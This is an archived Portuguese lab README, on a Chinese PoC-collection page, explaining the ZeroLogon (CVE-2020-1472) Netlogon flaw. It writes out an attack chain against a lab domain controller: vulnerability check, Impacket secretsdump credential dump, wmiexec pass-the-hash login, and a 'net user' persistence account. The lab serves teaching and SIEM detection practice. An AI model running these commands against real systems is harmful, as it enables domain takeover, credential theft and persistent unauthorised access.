关联漏洞
标题:
Microsoft Windows Netlogon 安全特征问题漏洞
(CVE-2020-1472)
描述:Microsoft Windows Netlogon是美国微软(Microsoft)公司的Windows的一个重要组件,主要功能是用户和机器在域内网络上的认证,以及复制数据库以进行域控备份,同时还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。 Microsoft Windows Netlogon 存在安全漏洞。攻击者可以使用 Netlogon 远程协议 (MS-NRPC) 建立与域控制器的易受攻击的 Netlogon 安全通道连接并进行特权提升。
描述
Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)
介绍
# ZeroLogon-CVE-2020-1472
Explicação e demonstração da vulnerabilidade ZeroLogon (CVE-2020-1472)
O objetivo deste laboratório é estritamente educacional.
A sua execução não é recomendada em ambientes de produção ou que não lhe pertençam.
## Sobre a Vulnerabilidade
**Contexto da vulnerabilidade**
Esta vulnerabilidade permite que um cyber criminoso assuma o controle de um Controlador de Domínio (DC). Isso é feito alterando ou removendo a senha de uma conta de serviço no controlador. O agente malicioso pode simplesmente causar uma negação de serviço ou assumir o controle e possuir toda a rede.
Em agosto de 2020, a Microsoft lançou um patch.
- Severidade: 10.0 (Crítica) (CVSS v3.1)
Componente afetado: Microsoft Netlogon Remote Protocol (MS-NRPC)
Versões do Windows afetas:
- Windows Server 2008 R2
- 2012 / 2012 R2
- 2016
- 2019
- Versões anteriores ao patch de agosto/setembro de 2020
## Requerimentos
Clonar os repositorios
- [Impacket](https://github.com/fortra/impacket)
- [zerologon-CVE-2020-1472](https://github.com/thatonesecguy/zerologon-CVE-2020-1472)
- [CVE-2020-1472 - Teste se o servidor alvo está vulneravel](https://github.com/SecuraBV/CVE-2020-1472)
Se for executar localmente!
- [Download do Kali Linux](https://www.kali.org/get-kali/#kali-platforms)
- [Downald do Windows Server 2008 R2 vulneravel](https://archive.org/details/windows-server-2008-ISO)
- [Virtualbox](https://www.virtualbox.org/)
Na AWS tambem é possivel com essas imagens (cuidado com o billing)
- [Windows Vulneravel - AMI da comunidade921877552404/win2016-dvwa-printnightmare-final-2022-07-04](https://console.aws.amazon.com/marketplace/search/listing/prodview-fznsw3f7mq7to?sr=0-1&ref_=beagle&applicationId=AWS-EC2-Console)
- [Kali Linux - AMI do Matketplace](https://console.aws.amazon.com/marketplace/search/listing/prodview-fznsw3f7mq7to?sr=0-1&ref_=beagle&applicationId=AWS-EC2-Console)
Extra: uma conta no Datadog ou Wazuh para análise dos eventos do SIEM.
- [Criando uma conta trial](https://app.datadoghq.com/signup?authType=password)
- [Instalando um agente do Datadog](https://docs.datadoghq.com/getting_started/agent/)
- [Configurando o SIEM no Windows](https://docs.datadoghq.com/integrations/event-viewer/?tab=logs#send-default-security-logs)
- [Wazuh Cloud](https://console.cloud.wazuh.com)
## Como explorar
Dica: No Kali Linux, o serviço SSH vem desativado por padrão — é necessário iniciá-lo manualmente.
Usando o [CVE-2020-1472 - Teste se o servidor alvo está vulneravel](https://github.com/SecuraBV/CVE-2020-1472). Execute o comando:
```
zerologon_tester.py <dc-name> <dc-ip>
```
<img width="1397" height="137" alt="Captura de Tela 2025-10-04 às 20 14 40" src="https://github.com/user-attachments/assets/38f16814-ff2e-48dd-ae3a-fd8ed869c692" />
A ferramenta secretdump é uma tooltik do [Impacket](https://github.com/fortra/impacket)
```
python3 secretsdump.py -just-dc wayne/w2008\$@192.168.1.75
```
<img width="1400" height="391" alt="Captura de Tela 2025-10-04 às 20 23 53" src="https://github.com/user-attachments/assets/ced73582-9211-4e6e-9d75-e290c96a7219" />
```
python3 wmiexec.py wayne/administrator@192.168.1.75 -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
```
<img width="1400" height="46" alt="Captura de Tela 2025-10-04 às 20 27 05" src="https://github.com/user-attachments/assets/f57f73bb-31af-412b-867e-c4c37cc05367" />
Se tudo ocorrer bem, conseguiremos fazer o login com o hash [What is a pass-the-hash attack?](https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/pass-the-hash-attack/)
<img width="1367" height="100" alt="Captura de Tela 2025-10-04 às 20 30 39" src="https://github.com/user-attachments/assets/fb5218f9-9386-4b20-8c9b-03451f624d45" />
Agora só criar uma persistência! Pode ser um novo usuário!
```
net user coringa Batman2025 /add
```
<img width="1367" height="176" alt="Captura de Tela 2025-10-04 às 20 36 09" src="https://github.com/user-attachments/assets/926f87b6-5639-4d4c-9f4d-6098e12f1112" />
Feito! O usuário foi criado com sucesso!
<img width="985" height="643" alt="Captura de Tela 2025-10-04 às 20 38 04" src="https://github.com/user-attachments/assets/6a57a58b-a570-4b6b-946d-0f614a0b990b" />
## Eventos no SIEM
## Referências
- [Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege](https://www.crowdstrike.com/en-us/blog/cve-2020-1472-zerologon-security-advisory/)
- [O que é Zerologon?](https://www.trendmicro.com/pt_br/what-is/zerologon.html)
- [[MS-NRPC]: Netlogon Remote Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/ff8f970f-3e37-40f7-bd4b-af7336e4792f)
- [CVE-2020-1472 Detail](https://nvd.nist.gov/vuln/detail/cve-2020-1472)
- [Monitor your Windows event logs with Datadog Cloud SIEM](https://www.datadoghq.com/blog/datadog-cloud-siem-windows-event-logs/)
文件快照
[4.0K] /data/pocs/44845dabceebd0d7a921dd58bdfa2a980060148c
└── [4.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。